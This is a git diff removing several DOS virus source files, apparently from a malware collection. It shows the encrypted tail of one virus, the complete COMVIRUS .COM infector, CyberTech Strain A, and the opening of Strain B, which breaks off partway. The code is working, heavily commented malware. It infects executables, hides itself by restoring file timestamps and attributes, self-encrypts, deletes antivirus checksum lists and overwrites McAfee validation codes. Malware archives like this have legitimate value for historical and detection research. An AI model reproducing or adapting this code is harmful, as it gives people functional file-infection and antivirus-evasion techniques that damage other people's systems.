4Bh, 01h, 47h,0DBh, 7Bh,0CCh - db 0DEh, 33h,0DBh,0FFh,0AFh, 00h - db 4Bh, 01h, 47h, 87h,0B6h, 9Fh - db 60h,0FEh,0B8h, 4Fh,0A5h, 29h - db 0BFh, 47h, 61h, 34h,0C2h,0E1h - db 65h, 33h,0B7h, 45h,0E2h,0F4h - db 98h, 78h, 26h, 8Ah, 9Ah,0CCh - db 0EBh,0A7h, 5Fh,0CDh,0ABh, 12h - db 0C3h, 95h,0DEh, 32h,0CEh, 01h - db 47h, 87h,0A7h, 01h, 47h,0DBh - db 0B5h,0CCh,0D2h, 08h, 14h, 58h - db 8Eh, 35h, 54h,0EDh, 8Dh, 09h - db 09h, 78h, 49h, 35h,0CAh - db 01h, 47h,0B8h, 4Ah, 4Fh,0A4h - db 2Dh, 21h,0CCh, 25h,0FEh,0B8h - db 97h, 61h, 1Dh, 10h, 40h,0A5h - db 32h, 18h, 2Dh, 98h, 33h, 21h - db 0CDh, 25h,0FEh,0B8h, 0Fh, 48h - db 0B8h, 15h, 0Fh, 67h, 87h,0B6h - db 0CAh, 35h,0FEh,0B8h, 47h,0B5h - db 0B0h, 5Bh,0D2h,0DEh, 32h,0DAh - db 01h, 47h, 68h, 9Eh, 0Fh,0D2h - db 3Dh - db 0B7h, 46h,0F2h,0F6h, 98h, 01h - db 47h, 87h,0A2h, 41h,0F2h,0FBh - db 9Fh -loc_34: - add [bx-25h],ax - mov word ptr ds:[61CCh],ax - sub al,2Dh ; '-' - db 0D6h,0DCh,0B3h, 99h, 01h, 47h - db 0B8h, 5Fh,0F1h, 66h, 33h,0EDh - db 0EAh, 48h,0B9h, 1Dh, 43h, 67h - db 0Fh, 98h,0B9h, 7Eh, 1Dh, 12h - db 48h,0EFh, 32h,0B7h, 47h,0FAh - db 0B8h, 98h,0C2h, 3Fh, 18h, 52h - db 0CFh,0AEh, 62h,0B7h, 47h,0E2h - db 0B6h, 98h, 9Ch,0ADh, 88h, 99h - db 0CDh, 99h,0D0h - db 2Dh -loc_35: - sub byte ptr [bp+di-55EEh],0Ch - js loc_34 ; Jump if sign=1 - inc cx - ja loc_35 ; Jump if above - xor si,word ptr ds:[0E247h][bx] - dec si - cbw ; Convrt byte to word - inc bp - and [bx+di],si - adc cl,[bx+si+19h] - xor dl,[bx+si] - retf -;* jns loc_36 ;*Jump if not sign - db 79h,0F0h - retf 0EA41h - cmp bx,[bp-48B9h] - mov si,5B05h - db 60h, 18h, 52h, 4Fh, 8Fh, 73h - db 0B7h, 46h, 61h,0B4h, 43h,0E2h - db 0EEh, 34h, 1Eh, 16h, 25h, 71h - db 7Bh, 3Eh, 8Dh, 41h, 09h, 24h - db 69h, 33h,0C2h, 41h,0EAh,0FBh - db 9Fh, 41h,0F2h, 33h, 98h,0E7h - db 0ACh, 87h,0D9h, 01h, 47h, 1Dh - db 13h, 58h, 65h, 32h,0CAh, 41h - db 0EAh,0FBh, 9Fh, 41h,0FAh, 19h - db 98h,0E7h,0ADh, 1Dh, 13h,0CBh - db 54h,0F1h, 49h, 06h, 48h,0BBh - db 9Eh, 8Fh, 84h,0C0h,0C2h, 0Fh - -crimeIIb endp - -seg_a ends - - - - end start diff --git a/c/CV4-30 (51).ASM b/c/CV4-30 (51).ASM deleted file mode 100755 index e50cc16..0000000 --- a/c/CV4-30 (51).ASM +++ /dev/null @@ -1,458 +0,0 @@ -title COMVIRUS -subttl By Drew Eckhardt -subttl Latest revision: 4-28-1991 - -;The author of this virus intends it to be used for educational -;purposes only, and assumes no responsibilities for its release, -;dammages resulting from its use, including but not limited to -;equipment dammage or data loss. - -;By assembling or examining this program, The user agrees to accept all -;responsibility for this programs use, or any portions of the code -;or concepts contained within. The user also agrees to not publicly release -;this virus, and to exercise necessary precautions to prevent its escape. -;The user accepts all responsibility arising from his actions. - -;Don't come crying to me if your hard disk gets infected, -;as THERE IS NO ANTIDOTE. HAHAHAH. - - -;Revision history: -;4-13: initial bug-free release, size=424 bytes with carrier - -;4-15: added no date change support, size=438 bytes with carrier - -;4-16: minor documentation changes, size=438 bytes with carrier, -; NO CODE CHANGE from 4-15 revision - -;4-21: fixed missing hex h suffixs, made MASM friendly, -; fixed incorrect assume statement (assume statements are ignored -; by A86) enabled hard/floppy infection based on floppy_only status -; size=438 bytes IF floppy_only, 424 bytes if not, with carrier. -; minimum virus length = 419 bytes - -;4-23: added control over how many programs are infected per run, -; switched method of infection, from copying to DTA then writing -; to disk to straight write to disk from memory. -; size=412 bytes IF floppy_only, 398 bytes if not, with carrier. -; minimum virus length = 393 bytes - -;4-28: used set DTA instead of default DTA/copy command line -; buffer, which had been used based on incorrect assumption -; eliminated calls to get time/date, get attribs -; by using information from find first/find next functions 4eh/4fh -; made warning optional for reduced space if desired. Also -; changed mov reg16, bp add reg16, constant to shorter LEA instruction. -; size=354 bytes IF floppy_only, warning on W/carrier -; 340 bytes IF w/warning & carrier program -; 286 bytes w/o warning, in program -; minimum virus length = 281 bytes for virus itself - -;4-28pm: instead of near CALL-pop sequences everywhere, switched to -; a single CALL near ptr Reference_Point, putting the result into -; si now that (until the end) string mode addressing is not used. -; Changed places where a register (used as an index) -; was being loaded THEN added to a single LEA isntruction -; size = 340 bytes if floppy_only, warning on w/carrier -; size = 326 bytes if w/warning & carrier -; size = 272 w/o warning -; minimum virus length = 267 bytes for the virus itself - -;4-28pm2: Eliminated unecessary flush buffers call. -; size = 336 bytes if floppy_only w/carrier -; size = 322 bytes w/warning & carrier -; size = 268 w/o warning -; minimum virus length = 263 bytes for virus itself - -;4-30: restored 5 bytes of original code at CS:0100 -; before infecting other programs, allowing the -; original code field to be modified so one disk write could be -; used instead of two -; minor documentation revisions - corrected incorrect -; opcodes in documentation -; size = 326 bytes if floppy_only w/carrier -; size = 312 bytes w/warning & carrier program -; size = 258 bytes w/carrier program -; Minimum virus length = 253 bytes for the virus itself - -;NOTE: The program is currently "set up" for A86 assembly with all -;conditional assembly symbols. #IF and #ENDIF should be replaced with -;MASM IFDEF and ENDIF directives for propper operation. -;Also, instead of using EQUates to define control symbols, the /D -;option or DEFINE could be used..... - - -;COMVIRUS.ASM must be assembled into a .COM file inorder to function -;properly. For convieniece, I recommend an assembler like A86 that will -;assemble to a .COM file without having to go through LINK and EXE2BIN - -;As is, it will infect .COM files located on the current disk. -;ONLY if it is a floppy disk, ONLY in the root directory. - -;This is a .COM infector virus, which, does nothing other than print a -;warning message, and spread to all files on the default disk IFF it is -;a floppy disk, in the root directory. - -;Theory: -;This is a non - overwriting virus. I took special precautions to preserve -;all functionality of the original program, including command line, parsed FCB, -;and segment register preservation. This makes the virus harder to detect. - -;The .COM file is a memory image - with no relocation table. Thus, it -;is an easy target for a virus such as this. - -;Infected file format -;jmp near ptr xxxx -;cli cli ;ID bytes -;ORIGINAL program code, sans 5 bytes -;5 bytes ORIGINAL program code -;VIRUS - -;This format makes infection VERY simple. We merely check for our signature -;(in this case cli cli (fa fa) - instructions that no programmer in his -;right mind would use - loading the original five bytes in the process. -;These original bytes are written to the end of the program, then -;A jump to where the virus is. - -;While infection is easy, this method presents some coding problems, as the -;virus does not know where in memory it is. Therefor, When we want to access -;data, we FIND OUT where we are, by performing a near call which PUSHES ip to the -;stack which is then popped. Addresses are then calculated relative to this -;via LEA - -;To run the program as normal, command line is restored, registers restored, -;And original code copied onto the first five bytes of the program. - - -;Program control symbols defined here -floppy_only equ 1 -infect_per_run equ 1 ;number of programs infected per run -warn_user equ 1 - -_TEXT segment byte 'CODE' - assume cs:_TEXT,ds:_TEXT,es:_TEXT,ss:_TEXT - org 100h - -Start: jmp infect; - -;This is our signature - cli - cli - -;Original code is the data field where we store the original program code -;which will replace our signature and jmp to infect - -Original_Code: int 20h ;five bytes that simply terminate - nop ;the program - nop - nop - - - -;Data for the virus. In a destructive virus, you would want to encrypt -;any strings using a simple one's complement (not) operation so as to -;thwart detection via text search utilities. Since we want detection to -;be easy, this un-encrypted form is fine. - - -Start_Virus: -#IF warn_user - Warning db "This file infected with COMVIRUS 1.0",10,13,'$' -#ENDIF - -;VirusMask is simply an ASCIIZ terminated string of the files we wish to -;infect. - - VirusMask db '*.COM', 0 -Infect: - push ax ;on entry to a .COM program, STACK: - ;MS-DOS puts drive identifiers ax (drive id for FCB's) <-- sp - ;for the two FCB's in here. Save - ;'em - - ;I use special trickery to find location of data. Since - ;NEAR calls/jmps are RELATIVE, call near ptr find_warn is - ;translated to e8 0000 - which will simply place the location - ;of Reference onto the stack. Our data can be found relative to - ;this point. - - call near ptr Reference ;All data is reference realative to - ;Reference - - -Reference: pop bx ;which is placed into bx for LEA - ;instructions - ;bx now contains the REAL address of - ;Reference - ;si points to real address of original - ;code field - lea si, [bx-(offset Reference - offset Original_Code)] - mov di, 0100h ;original code is at 100h - mov cx, 5 ;5 bytes - cld ;from start of buffer - rep movsb ;do it - - mov si, bx ;since BX is used in handle - ;based DOS calls, for the remainder - ;of the virus, si will contain the - ;actual address of reference - -#IF warn_user - - ;Always calculate the address of data relative to known Reference - ;Point - lea dx, [si-(offset Reference - offset Warning)] - mov ah,9h ;DO dos call, DS:DX pointing - int 21h ;to $ terminated string - - ;We want to make sure that the user gets the message - -WaitForKey: - mov ah, 0bh ;we will wait for a keypress - int 21h ;signifying the user has - or al, al ;seen the message. - jz WaitForKey - -#ENDIF - -#IF FLOPPY_ONLY - - ;Since this is a simple demonstration virus, we will only infect - ;.COM files on the default drive IFF it is a floppy disk.... - ;So, we will get information about the disk drive. - - - push ds ;ds:bx returns a byte to - ;media descriptor - - mov ah, 1bh ;get disk information STACK - int 21h ;DOIT ax (drive ID's) - cmp byte ptr ds:[bx], 0f8h ;see if its a hard disk ds <--sp - - pop ds ;restore ds STACK - jne Floppy ;if it was hard.... ax <--sp - jmp near ptr done ;we're nice guys and are done - -Floppy: ;Since it was floppy, we can go on with the infection! -#ENDIF - ;The default DTA, as is will give us problems. The designers of - ;MickeySoft DOS decided to put default DTA at ofset 128 in - ;the PSP. PROBLEM: This is also where the user's precious command - ;line is, and we MUST remain undectected. SO.... we allocate a - ;DTA buffer on the stack. 43 bytes are needed, 44 will do. - - sub sp, 44 ;allocate space for findfirst/findnext DTA - mov bp, sp ;set up bp as a reference to this area - - ;Set the DTA - mov dx, bp ;point DS:DX to our area - mov ah, 1ah ;set DTA - int 21h - - ;Set up pointers to data in DTA - dta equ word ptr [bp] - file_name equ word ptr [bp+1eh] - attributes equ byte ptr [bp+15h] - time_stamp equ word ptr [bp+16h] - date_stamp equ word ptr [bp+18h] - file_size equ dword ptr [bp+1ah] - - ;We dynamically allocate a variable to store the number of programs STACK - ;The virus has infected. FCB drives - ; bp--> 44 byte DTA - infected_count equ byte ptr[bp-2]; Infected_Count - xor ax, ax ;zero variable, sp--> buffer (6 bytes) - push ax ;allocate it on the stack - sub sp, 6 ;allocate small buffer - - ;Now, we begin looking for files to infect. - lea dx, [si - (offset Reference - offset VirusMask)] - ;DS:DX points to the search string STACK - mov ah, 4eh ;find first matching directory entry FCB drives (word) - mov cx, 111b ;only default directory, FILES - ;hidden, system and normal - int 21h ;doit bp--> 44 byte DTA buffer - ; infected count (word) - jnc Research ;carry is clear when a file was sp--> 6 byte buffer - jmp nofile ;found. - - -ReSearch: -;All handle based DOS calls take a pointer to an ASCIIZ file name in ds:dx - lea dx, file_name - -;Since this is a virus, we want to infect files that can't be touched by -;DOS commands, this means readonly, system, and hidden files are at our -;mercy. To do this, we rely on the findfrst/next attributes and other data -;to restore the attribute byte to the original settings. get/SET can fix -;them to be suitable - mov cl, attributes - and cl, 11100000b ;not readonly, system, or hidden STACK - ; FCB drives - mov ax, 4301h ;set attributes bp--> buffer (44 bytes) - int 21h ; buffer (6 bytes) - ; sp--> infected_count - jnc NoError ;check for error - jmp Restore_Flags -NoError: - mov ax, 3d02h ;now, open file using handle, - ;read/write access - int 21h ; - jnc NoError2 ;IF there was an error, we are done - jmp Restore_Flags ;But we don't need to commit or close - -NoError2: - mov bx, ax ;The handle was returned in ACC. - ;Howwever, all handle based DOS - ;calls expect it in BX - - -;We don't want to infect the program more than once, so we will -;check to see if it is infected. - - - mov ax, 4200h ;seek relative to start of file - ; bx contains handle from open operation - xor cx,cx ;cx:dx is file pointer - xor dx, dx ; - int 21h ;DOIT - -;Now, we will read in enough data to see if we have our virus signature. - mov ah, 3fh ;read data - lea dx, [si-(offset reference-offset original_code)] - ;into original_code buffer - mov cx, 5 ;5h bytes - ; bx contains handle from last operation - int 21h - - cmp word ptr [si-(offset reference-offset original_code)+3], 0fafah - jne GoApe ;if we aren't already infected, - jmp Error ;go for it - -GoApe: -;Since it is safe to infect, we will - mov ax, 4202h ;seek end of file - xor cx, cx - xor dx, dx - int 21h - - or dx, dx ;check for valid .COM format - jz Less_Than_64K - jmp Error - -Less_Than_64K: - -;Now, we must calculate WHERE the jump will be to. Let's examine the program -;Structure: -;jmp near ptr xxxx -;Cli Cli }These add up to the original length -;Orignal code sans 5 bytes - -;Original_Code (5 bytes) }The length of all virus data -;Other virus data is equal to the difference in -;Infect the addresses of Infect and Original_Code - -;End_Virus - - -;Thus, the jump must jump TO (offset Infect- offset Original_Code + Original_Length + origin) -;However, in the 80x86, NEAR jumps are calculated as an offset from the position -;of the next statement to execute (because of fetch/execute cycle operation). - -;Since jmp near ptr xxxx takes 3 bytes, the next instruction is THREE bytes from -;The 0E9h jmp near instruction, so xxxx will be (offset Infect-Offset Original_Code -;+Original_Length-3); - - ;Since AX already contains the original length, we will merely add - ;Space for the virus data, and take care of the three bytes - ;of code generated by the jmp near instruction. - - add ax, (offset Infect - Offset Original_Code -3) - - ;calculate jump address - mov byte ptr [bp-8], 0e9h ;jmp near instruction - mov word ptr [bp-7], ax ;offset for near jmp - mov word ptr [bp-5], 0fafah ;cli cli - - mov ax, 4200h ;seek begining of file - xor cx, cx - mov dx, cx - int 21h - - mov ah, 40h ;write patched code - mov cx, 5 ;5 bytes of code - lea dx, [bp-8] ;our buffer - int 21h - - mov ax, 4202h ;seek EOF - xor cx, cx - xor dx, dx - int 21h - - - lea dx, [si - (offset Reference - offset Original_Code)]; set start - mov cx, (offset End_Virus - offset Original_Code) ;set length - mov ah, 40h ;append virus to file - int 21h ;doit - - inc infected_Count ;bump up the number of programs infected - -Error: mov dx,date_stamp ;restore date - mov cx,time_stamp ;restore time - mov ax, 5701h ;set them - int 21h - - mov ah, 3eh ;close file - int 21h - -Restore_Flags: - xor ch, ch ;zero hi byte flags - mov cl,attributes ;restore flags - lea dx, file_name ;ds:dx points to ASCIIZ string - ;in the buffer, offset 1eh contains - ;the file name - mov ax, 4301h ;get/SET flags - int 21h ;Doit - -DoAgain:;See if we're done infecting - cmp infected_count, infect_per_run - jae NoFile ;if we're done, same as no new file - - - mov ah, 4fh ;find next - int 21h - - jc NoFile ;if carry is clear, DOIT again! - jmp ReSearch - -;Since we have no more files, we will restore things to normal. -NoFile: - mov dx, 80h ;reset default dta at DS:80h - mov ah, 1ah ;set DTA - int 21h - - add sp, 52 ;deallocate buffers and infected_count - - - -;Put original code of program BEFORE it was infected back in place! - - -Done: - pop ax ;restore ax - - - ;FUNKY code! In the 80x86, all NEAR or SHORT jmp opcodes take - ;a RELATIVE address...... BUT a retn opcode pops a near absolute - ;address of the stack - saves us the trouble of some calculating - ;relative to here, and the trouble of a self-modifying - ;far absolute jmp! (5 bytes) - - mov bx, 0100h - push bx - ret ;easiest jump to cs:100 - -End_Virus: -_TEXT ends -end start - diff --git a/c/CYBERTCH (52).ASM b/c/CYBERTCH (52).ASM deleted file mode 100755 index 7446f9a..0000000 --- a/c/CYBERTCH (52).ASM +++ /dev/null @@ -1,427 +0,0 @@ -; -; CyberTech Virus - Strain A John Tardy (C) 1992 -; -; Written in A86 V3.22 -; -; Description : This is a Non-Resident Self-Encrypting .COM file infector -; which infects COM files in the current directory. It will -; remove CHKLIST.CPS from the current directory after it has -; infected a program. CHKLIST.CPS is a file which is used by -; VDEFEND of PCSHELL and Central Point AntiVirus. When a -; validation code is added by SCAN of McAfee, it will overwrite -; the code, so the file is no longer CRC protected anymore. -; After 1992, the virus activated. It then displays a message -; that your system has been infected. The virus will remove -; itself from the infected file and completely restore it. If -; a validation code was added, it is lost, but the file is not -; corrupted and will function normally. Even when the file is -; compressed afterwards by an executable file compressor, it is -; uncompressed. Before 1993, the virus sometimes display it's -; copyright. This is caused when the random encryption counter -; is a 0. It will redefine it, so there is no visible text in -; the virus. It checks also if there is enough diskspace -; aveable and installs a critical error handler. -; - Org 0h ; Generate .BIN file - -Start: Jmp MainVir ; Jump to decryptor code at EOF - - Db '*' ; Virus signature (very short) - -; -; Decryptor procedure -; - -MainVir: Call On1 ; Push offset on stack - -On1: Pop BP ; Calculate virus offset - Sub BP,Offset MainVir+3 ; - - Push Ax ; Save possible error code - - Lea Si,Crypt[BP] ; Decrypt the virus with a - Mov Di,Si ; very simple exclusive or - Mov Cx,CryptLen ; function. -Decrypt: Lodsb ; - Xor Al,0 ; - Stosb ; - Loop Decrypt ; - -DecrLen Equ $-MainVir ; Length of the decryptor - -; -; Main initialization procedure -; - -Crypt: Mov Ax,Cs:OrgPrg[BP] ; Store begin of host at - Mov Bx,Cs:OrgPrg[BP]+2 ; cs:100h (begin of com) - Mov Cs:Start+100h,Ax ; - Mov Cs:Start[2]+100h,Bx ; - - Xor Ax,Ax ; Get original interrupt 24 - Push Ax ; (critical error handler) - Pop Ds ; - Mov Bx,Ds:[4*24h] ; - Mov Es,Ds:[4*24h]+4 ; - - Mov Word Ptr Cs:OldInt24[Bp],Bx ; And store it on a save place - Mov Word Ptr Cs:OldInt24+2[Bp],Es ; - - Lea Bx,NewInt24[Bp] ; Install own critical error - Push Cs ; handler to avoid messages - Pop Es ; when a disk is write - Mov Word Ptr Ds:[4*24h],Bx ; protected and such things - Mov Word Ptr Ds:[4*24h]+2,Es ; - Push Cs ; - Pop Ds ; - - Mov Ah,30h ; Check if DOS version is - Int 21h ; 3.0 or above for correct - Cmp Al,3 ; interrupt use - Jae On2 ; - Jmp Ready ; - -On2: Mov Ax,3600h ; Check if enough disk space - Xor Dx,Dx ; is aveable for infecting - Int 21h ; (3 clusters should be - Cmp Bx,3 ; enough i think) - Ja TestDate ; - Jmp Ready ; - -TestDate: Mov Ah,2ah ; Check if 1992 is past time - Int 21h ; already - Cmp Cx,1993 ; - Jae Clean ; - 1993 or more - Jmp NoClean ; - Not 1993 or more - -; -; Main Cleanup procedure -; - -Clean: Push Cs ; Show message that the - Pop Ds ; system has been infected - Mov Ah,9 ; - Lea Dx,Removed[Bp] ; - Int 21h ; - - Mov Ah,1ah ; Move DTA to a safe place - Mov Dx,0fd00h ; - Int 21h ; - - Mov Ax,Cs:[2ch] ; Find the name of the - Mov Ds,Ax ; program that is now - Mov Si,0 ; executed (me must search in - Mov Cx,4000h ; the DOS environment for -Seeker: Lodsb ; safe tracking of the name - Cmp Al,1 ; - Je On3 ; - Loop Seeker ; - -On3: Inc Si ; Transfer the found name - Push Cs ; to a safe address in memory - Pop Es ; - Mov Di,0fd80h ; - Mov Cx,80h ; -Trans: Lodsb ; - Cmp Al,0h ; - Jne Verder ; - Xor Ax,Ax ; -Verder: Stosb ; - Loop Trans ; - - Push Cs ; Read file attributes and - Pop Ds ; check if an error has - Mov Ax,4300h ; occured - Mov Dx,0fd80h ; - Int 21h ; - Jnc DeInfect ; - No error, DeInfect - Jmp Ready ; - Error, Ready - -DeInfect: Push Cx ; Store old file attributes - - Mov Ax,4301h ; Clear file attributes - Xor Cx,Cx ; (for read only etc.) - Int 21h ; - - Mov Ax,3d02h ; Open the file - Int 21h ; - - Mov Bx,Ax ; Read file date/time stamp - Mov Ax,5700h ; and store it on the stack - Int 21h ; for later use - Push Cx ; - Push Dx ; - - Mov Ah,3eh ; Close file - Int 21h ; - - Mov Dx,0fd80h ; Create a new file with the - Xor Cx,Cx ; same name - Mov Ah,3ch ; - Int 21h ; - - Mov Bx,Ax ; store file handle in BX - - Mov Ah,40h ; write memory image of host - Mov Dx,100h ; program to file (the original - Mov Cx,Bp ; file is now back again) - Sub Cx,0fch ; - Int 21h ; - - Pop Dx ; restore file date/time - Pop Cx ; stamp - Mov Ax,5701h ; - Int 21h ; - - Mov Ah,3eh ; close file - Int 21h ; - - Pop Cx ; restore file attributes - Mov Ax,4301h ; - Mov Dx,0fd80h ; - Int 21h ; - - Push Cs ; jump to ready routine - Pop Ds ; (shutdown of the virus) - Jmp Ready ; - -; -; Main viral part -; - -NoClean: Mov Ah,1ah ; Store DTA at safe place - Mov Dx,0fd00h ; - Int 21h ; - - Mov Ah,4eh ; FindFirsFile Function - -Search: Lea Dx,FileSpec[BP] ; Search for filespec given - Xor Cx,Cx ; in FileSpec adress - Int 21h ; - Jnc Found ; Found - Found - Jmp Ready ; Not Found - Ready - -Found: Mov Ax,4300h ; Get file attributes and - Mov Dx,0fd1eh ; store them on the stack - Int 21h ; - Push Cx ; - - Mov Ax,4301h ; clear file attributes - Xor Cx,Cx ; - Int 21h ; - - Mov Ax,3d02h ; open file with read/write - Int 21h ; access - - Mov Bx,5700h ; save file date/time stamp - Xchg Ax,Bx ; on the stack - Int 21h ; - Push Cx ; - Push Dx ; - - Mov Ah,3fh ; read the first 4 bytes of - Lea Dx,OrgPrg[BP] ; the program onto OrgPrg - Mov Cx,4 ; - Int 21h ; - - Mov Ax,Cs:[OrgPrg][BP] ; Check if renamed exe-file - Cmp Ax,'ZM' ; - Je ExeFile ; - - Cmp Ax,'MZ' ; Check if renamed weird exe- - Je ExeFile ; file - - Mov Ah,Cs:[OrgPrg+3][BP] ; Check if already infected - Cmp Ah,'*' ; - Jne Infect ; - -ExeFile: Call Close ; If one of the checks is yes, - Mov Ah,4fh ; close file and search next - Jmp Search ; file - -FSeek: Xor Cx,Cx ; subroutine to jump to end - Xor Dx,Dx ; or begin of file - Int 21h ; - Ret ; - -Infect: Mov Ax,4202h ; jump to EOF - Call FSeek ; - - Cmp Ax,0f900 ; Check if file too large - Jae ExeFile ; if yes, goto exefile - - Cmp Ax,10 ; Check if file too short - Jbe ExeFile ; if yes, goto exefile - - Mov Cx,Dx ; calculate pointer to offset - Mov Dx,Ax ; EOF-52 (for McAfee validation - Sub Dx,52 ; codes) - - Mov Si,Cx ; move file pointer to the - Mov Di,Dx ; calculated address - Mov Ax,4200h ; - Int 21h ; - - Mov Ah,3fh ; read the last 52 bytes - Mov Dx,0fb00h ; of the file - Mov Cx,52 ; - Int 21h ; - - Cmp Ds:0Fb00h,0fdf0h ; check if protected with the - Jne Check2 ; AG option - Cmp Ds:0fb02h,0aac5h ; - Jne Check2 ; - - Mov Ax,4200h ; yes - let virus overwrite - Mov Cx,Si ; the code with itself, so - Mov Dx,Di ; the file has no validation - Int 21h ; code - Jmp CalcVirus ; - -Check2: Cmp Ds:0Fb00h+42,0fdf0h ; check if protected with the - Jne Eof ; AV option - Cmp Ds:0Fb02h+42,0aac5h ; - Jne Eof ; - - Mov Ax,4200h ; yes - let virus overwrite - Mov Cx,Si ; the code with itself, so - Mov Dx,Di ; the file has no validation - Add Dx,42 ; code - Int 21h ; - Jmp CalcVirus ; - -Eof: Mov Ax,4202h ; not AG or AV - jump to - Call Fseek ; EOF - -CalcVirus: Sub Ax,3 ; calculate the jump for the - Mov Cs:CallPtr[BP]+1,Ax ; virus start - -GetCrypt: Mov Ah,2ch ; get 100s seconds for the - Int 21h ; encryption value. - Cmp Dl,0 ; if not zero, goto NoZero - Jne NoZero ; - - Mov Ah,9 ; If zero, display copyright - Lea Dx,Msg[Bp] ; message and generate again - Int 21h ; a number - Jmp GetCrypt ; - -NoZero: Mov Cs:Decrypt+2[BP],Dl ; Store key into decryptor - - Lea Si,MainVir[BP] ; Move changed decryptor to - Mov Di,0fb00h ; a safe place in memory - Mov Cx,DecrLen ; - Rep Movsb ; - - Lea Si,Crypt[BP] ; Encrypt the virus and merge - Mov Cx,CryptLen ; it to the changed decryptor -Encrypt: Lodsb ; code - Xor Al,Dl ; - Stosb ; - Loop Encrypt ; - - Mov Ah,40h ; append virus at EOF or over - Lea Dx,0fb00h ; the validation code of - Mov Cx,VirLen ; McAfee - Int 21h ; - - Mov Ax,4200h ; Jump to BOF - Call FSeek ; - - Mov Ah,40h ; Write Jump at BOF - Lea Dx,CallPtr[BP] ; - Mov Cx,4 ; - Int 21h ; - - Call Close ; Jump to Close routine - -Ready: Mov Ah,1ah ; Restore DTA to normal - Mov Dx,80h ; offset - Int 21h ; - - Mov Ax,Cs:OldInt24[Bp] ; remove critical error - Mov Dx,Cs:OldInt24+2[Bp] ; handler and store the - Xor Bx,Bx ; original handler at the - Push Bx ; interrupt table - Pop Ds ; - Mov Ds:[4*24h],Dx ; - Mov Ds:[4*24h]+2,Ax ; - Push Cs ; - Pop Ds ; - - Pop Ax ; restore possible error code - - Mov Bx,100h ; nice way to jump to the - Push Cs ; begin of the original host - Push Bx ; code - Retf ; - -Close: Pop Si ; why??? - - Pop Dx ; restore file date/time - Pop Cx ; stamp - Mov Ax,5701h ; - Int 21h ; - - Mov Ah,3eh ; close file - Int 21h ; - - Mov Ax,4301h ; restore file attributes - Pop Cx ; - Mov Dx,0fd1eh ; - Int 21h ; - - Mov Ah,41h ; delete CHKLIST.CPS (the - Lea Dx,CpsName[BP] ; Central Point CRC list) - Int 21h ; - - Push Si ; why??? - Ret - -; -; Message when we are in 1993 -; - -Removed Db 13,10,'The previous year you have been infected by a virus' - Db 13,10,'without knowing or removing it. To be gentle to you' - Db 13,10,'I decided to remove myself from your system. I suggest' - Db 13,10,'you better buy ViruScan of McAfee to ensure yourself' - Db 13,10,'complete security of your precious data. Next time you' - Db 13,10,'could be infected with a malevolent virus.' - Db 13,10,10,'May I say goodbye to you for now....',13,10 - -; -; Message when encryption byte = 0 or when we are living in 1993 -; - -Msg Db 13,10,'CyberTech Virus - Strain A' - Db 13,10,'(C) 1992 John Tardy of Trident' - Db 13,10,'$' - -; -; New critical error handler -; - -NewInt24: Mov Al,3 ; supress any critical error - Iret ; messages - -CpsName Db 'chklist.cps',0 ; name for CP CRC-list - -OldInt24 Dd 0 ; storage place for old int 24 - -CallPtr Db 0e9h,0,0 ; jump to place at BOF - -FileSpec Db '*.COM',0 ; filespec and infection marker - -OrgPrg: Int 20h ; original program - Db 'JT' ; - -CryptLen Equ $-Crypt ; encrypted part length - -VirLen Equ $-MainVir ; total virus length - - -; -; > and Remember Don't Forget to Call < -; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < -; diff --git a/c/CYBTCH-B (53).ASM b/c/CYBTCH-B (53).ASM deleted file mode 100755 index b7ae904..0000000 --- a/c/CYBTCH-B (53).ASM +++ /dev/null @@ -1,500 +0,0 @@ -; -; CyberTech Virus - Strain B John Tardy (C) 1992 -; -; Written in A86 V3.22 -; -; Description : This is a Non-Resident Self-Encrypting .COM file infector -; which infects COM files in the current directory. It will -; remove CHKLIST.CPS from the current directory after it has -; infected a program. CHKLIST.CPS is a file which is used by -; VDEFEND of PCSHELL and Central Point AntiVirus. When a -; validation code is added by SCAN of McAfee, it will overwrite -; the code, so the file is no longer CRC protected anymore. -; After 1993, the virus activated. It then displays a message -; that your system has been infected. The virus will remove -; itself from the infected file and completely restore it. If -; a validation code was added, it is lost, but the file is not -; corrupted and will function normally. Even when the file is -; compressed afterwards by an executable file compressor, it is -; uncompressed. Before 1994, the virus sometimes display it's -; copyright. This is caused when the random encryption counter -; is a 0. It will redefine it, so there is no visible text in -; the virus. It checks also if there is enough diskspace -; aveable and installs a critical error handler. -; - Org 0h ; Generate .BIN file - -Start: Jmp MainVir ; Jump to decryptor code at EOF - - Db '*' ; Virus signature (very short) - -; -; Decryptor procedure -; - -MainVir: Call On1 ; Push offset on stack - -On1: Pop BP ; Calculate virus offset - Sub BP,Offset MainVir+3 ; - - Push Ax ; Save possible error code - - Lea Si,Crypt[BP] ; Decrypt the virus with a - Mov Di,Si ; very simple exclusive or - Mov Cx,CryptLen ; function. -Decrypt: Lodsb ; - Xor Al,0 ; - Stosb ; - Loop Decrypt ; - -DecrLen Equ $-MainVir ; Length of the decryptor - -; -; Main initialization procedure -; - -Crypt: Mov Ax,Cs:OrgPrg[BP] ; Store begin of host at - Mov Bx,Cs:OrgPrg[BP]+2 ; cs:100h (begin of com) - Mov Cs:Start+100h,Ax ; - Mov Cs:Start[2]+100h,Bx ; - - Xor Ax,Ax ; Get original interrupt 24 - Push Ax ; (critical error handler) - Pop Ds ; - Mov Bx,Ds:[4*24h] ; - Mov Es,Ds:[4*24h]+4 ; - - Mov Word Ptr Cs:OldInt24[Bp],Bx ; And store it on a save place - Mov Word Ptr Cs:OldInt24+2[Bp],Es ; - - Lea Bx,NewInt24[Bp] ; Install own critical error - Push Cs ; handler to avoid messages - Pop Es ; when a disk is write - Mov Word Ptr Ds:[4*24h],Bx ; protected and such things - Mov Word Ptr Ds:[4*24h]+2,Es ; - Push Cs ; - Pop Ds ; - - Mov Ah,30h ; Check if DOS version is - Int 21h ; 3.0 or above for correct - Cmp Al,3 ; interrupt use - Jae TestDate ; - Jmp Ready ; - -TestDate: Mov Ah,2ah ; Check if 1993 is past time - Int 21h ; already - Cmp Cx,1994 ; - Jae Clean ; - 1994 or more - Jmp NoClean ; - Not 1994 or more - -; -; Main Cleanup procedure -; - -Clean: Mov Ah,1ah ; Move DTA to a safe place - Mov Dx,0fd00h ; - Int 21h ; - - Mov Ax,Cs:[2ch] ; Find the name of the - Mov Ds,Ax ; program that is now - Mov Si,0 ; executed (me must search in - Mov Cx,4000h ; the DOS environment for -Seeker: Lodsb ; safe tracking of the name - Cmp Al,1 ; - Je On3 ; - Loop Seeker ; - -On3: Inc Si ; Transfer the found name - Push Cs ; to a safe address in memory - 